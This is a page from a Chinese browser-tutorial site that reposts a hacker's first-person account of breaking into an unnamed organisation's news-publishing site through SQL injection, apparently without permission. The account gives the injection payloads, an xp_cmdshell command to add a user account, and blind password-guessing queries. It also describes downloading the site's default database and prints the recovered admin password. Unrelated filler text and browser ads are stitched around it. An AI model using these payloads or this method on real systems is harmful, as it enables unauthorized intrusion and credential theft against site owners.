浏览器大全:是一个提供流行浏览器教程、在线学习分享的学习平台!

易得新闻系统有问题

网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。

我几乎从来都没有很好的完成过一次完整的Sql Injection,所以特别希望能够有一次这样的经历。

终于昨天(昨天晚上太晚,所以今天玩完)一次的偶然机会,让我遇见了这样一个网站,她的新闻发布系统的shownews.asp没有很好的处理参数id。
/news/shownews.asp?id=5' 返回结果是:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14' 
[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 'id = 5'' 中。 
/news/shownews.asp,行26 

这至少可能是一个使用ACCESS数据库的新闻发布系统。我用LANguard3简单扫描了一下,UDP端口1434是打开的,所以首先尝试着用
shownews.asp?id=5';exec master..xp_cmdshell 'net user mix /add';-- 想想添加账户,但是没有成功,返回结果是:
[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'id = 5';exec master..xp_cmdshell 'net user mix /add';--' 中。

Envymask提醒我这应该是Access的数据库,所以我只好慢慢的进行拓展。首先是猜猜看这个新闻发布系统是不是有免费的代码下载,我没有在他任何页面中看到有这个系统的版本,不死心的我直接在google中搜索/news/shownews.asp?id= ,由于这种命名太普通了,很快我就从一大堆网站中退了出来。我们需要找个名字有点特别的文件才好找。

再看看有没有熟悉一点的表名,比如:
shownews.asp?id=5 or id in (select id from admin)
猜了很久也只猜到一个news得表单,没有什么用。

再想想,这种新闻发布系统一般都有管理员登陆的后台程序的吧,不知道密码会不会是弱智。很快就猜到了直接访问/news/admin就有一个要求输入密码的页面,试了一会儿还是进不去。但是另外一个地方吸引了我,就是提交密码后返回错误的那个文件/news/admin/chklogin.asp 。

我马上用google搜了一把,在一个医院网站上看到了有这个文件,到她的/news/admin/一看,密码输入提示中清楚地写着易得新闻系统,我想要的那个该死网站怎么这个都改掉了,害得我走了这么多的弯路。下载易得新闻系统免费代码1.0,打开他的readme,试了试默认密码yide,不行!数据库中存放密码的是siteman表单中的pwd值,当然就先猜猜看他的第一位密码是什么:
and 1=(select pwd from siteman where left(pwd,1)='y')
结果正常返回页面,但新闻没有找到。再试试看:
and 1=(select pwd from siteman where left(pwd,3)='mix')
返回结果和上面一样。我没有认真学过sql语句,但这些现象明显的告诉我,如果我猜密码不对才会有上面的返回结果,如果我猜的密码是对的,可能是另外一个返回结果。当然,这都只是我的一厢情愿!幸好我很快证实了我的想法:
and 1=(select pwd from siteman where left(pwd,1)='h') 返回结果是:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07' 
[Microsoft][ODBC Microsoft Access Driver] 标准表达式中数据类型不匹配。 
/news/shownews.asp,行26 

我开始想着找个perl脚本自己改改来套这个密码了!无意中我想起了另外一件事,我还没有尝试下载他的数据库,鬼知道改了默认数据库名字没有。555 结果可想而知,她没有改,她是懒鬼,我是糊涂虫,早知道这样,又可以少走N多弯路,害得我猜密码猜了那么长时间~~~555

用密码hsj5538180登陆,这个新闻发布系统实在是简陋的可以,没有什么可利用的价值!但是在他的修改密码页面中,我看到了下面几个字:“风雪新闻中心管理密码更改”原来程序是可以乱抄的~~~哈哈哈

感谢Envymask的提醒,感谢这个网站让我玩了1个钟头!实在是我贪玩,文章没有任何新意,所以也要感谢大家有耐心看这篇文章。

网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。



相关软件

2345加速浏览器官方版

2345加速浏览器官方版 | 56.2MB

2345加速浏览器官方版

新一代2345加速浏览器采用Chromium和IE双内核,主打极速与安全特性。基于Chromium深度定制,引入网页智能预加载技术,访问网页更快速..

QQ浏览器官方正式版

QQ浏览器官方正式版 | 49.67MB

QQ浏览器官方正式版

QQ浏览器秉承TT浏览器1-4系列方便易用的特点,但技术架构不同,交互和视觉表现也重新设计,采用Chromium内核+IE双内核,让浏览快速稳定...

百度浏览器最新版下载

百度浏览器最新版下载 | 13.3MB

百度浏览器最新版下载

q百度浏览器,是一款简洁轻快、智能懂你的浏览器。依靠百度强大的搜索平台,在满足用户浏览网页的基础上,它整合百度体系业务优势,带给用户更方便的浏览方式功能...

UC浏览器官方正式版

UC浏览器官方正式版 | 44.2MB

UC浏览器官方正式版

UC浏览器(UC Browser)是UC Mobile Limited在2004年8月开发的一款软件,分uc手机浏览器和uc浏览器电脑版。UC浏览器是全球使用量最大的第三方手机浏览器...

猎豹浏览器2022最新版下载

猎豹浏览器2022下载 | 45MB

猎豹浏览器2022最新版下载

猎豹安全浏览器对Chrome的Webkit内核进行了超过100项的技术优化,访问网页速度更快。其具有首创的智能切换引擎,动态选择内核匹配不同网页...

360安全浏览器官方版下载

360安全浏览器下载 | 21.4MB

360安全浏览器官方版下载

360安全浏览器拥有全国最大的恶意网址库,采用恶意网址拦截技术,可自动拦截挂马、欺诈、网银仿冒等恶意网址。独创沙箱技术,在隔离模式即使访问****也不会感染...